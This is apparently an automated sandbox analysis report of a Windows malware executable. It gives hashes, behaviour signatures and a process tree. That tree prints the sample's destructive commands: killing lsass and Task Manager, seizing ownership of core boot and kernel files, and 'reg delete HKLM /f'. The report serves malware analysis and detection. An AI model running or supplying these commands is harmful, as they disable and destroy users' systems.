Analysis

  • max time kernel
    14s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-10-2024 01:00

Errors

Reason
Machine shutdown

General

  • Target

    6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe

  • Size

    55KB

  • MD5

    09718d571b01cb93e6f983be7b99a4b2

  • SHA1

    d2d1212212bfc691e115b24e8132ae4658e510e8

  • SHA256

    6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169

  • SHA512

    9c7fad95ad56c1f457be067467886c7d23fa57734547688c64d16f37f3190cc017987278a2387b217e4a8108ac04d33b1fe5353cfb350717a839ecb6dd533098

  • SSDEEP

    1536:34dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNiPJ:34dzVTaer344JzthRZijQ1Ji

Malware Config

Signatures

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 24 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Possible privilege escalation attempt 22 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Modifies file permissions 1 TTPs 22 IoCs
  • Modifies system executable filetype association 2 TTPs 46 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe
    "C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98E4.tmp\98E5.tmp\98E6.bat C:\Users\Admin\AppData\Local\Temp\6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169.exe"
      2⤵
      • Drops file in Drivers directory
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\system32\fsutil.exe
        fsutil dirty query C:
        3⤵
          PID:3068
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im taskmgr.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4684
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im regedit.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4216
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\hal.dll /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4976
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\hal.dll /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:320
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winload.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3932
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winload.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3300
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winresume.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1360
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3368
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\winlogon.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3604
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2480
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\wininit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2284
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1076
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3488
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4068
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\regedit.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3612
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4996
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\taskmgr.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2248
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3524
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\consent.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2896
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\consent.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1892
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\drivers /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2288
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\drivers /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1052
        • C:\Windows\System32\takeown.exe
          takeown /f C:\Windows\System32\shutdown.exe /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3808
        • C:\Windows\System32\icacls.exe
          icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1444
        • C:\Windows\System32\taskkill.exe
          taskkill /f /im lsass.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1080
        • C:\Windows\System32\reg.exe
          reg delete HKLM /f
          3⤵
          • Boot or Logon Autostart Execution: Active Setup
          • Manipulates Digital Signatures
          • Modifies system executable filetype association
          • Event Triggered Execution: Netsh Helper DLL
          • Checks processor information in registry
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Modifies registry key
          PID:4864

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\98E4.tmp\98E5.tmp\98E6.bat

      Filesize

      2KB

      MD5

      ebcfb026e8f9137c99136ab348cb6817

      SHA1

      fbad88aee4e564567a7b9c11934ade9fc3c0a47d

      SHA256

      73e3d00900152813c2d3da00e2f16a162787e7de747e5d3e18a06cefe3e1ad51

      SHA512

      110422386157caf977a9e952c859344bf21aee9e0d148e42c2026428d3a9e20affe05e3c1f96082e943ddc6ea671f15e30f8c2b42f9d75845cb1abf2867da9b7

    • memory/2728-0-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2728-4-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB

    • memory/2728-6-0x0000000140000000-0x0000000140027000-memory.dmp

      Filesize

      156KB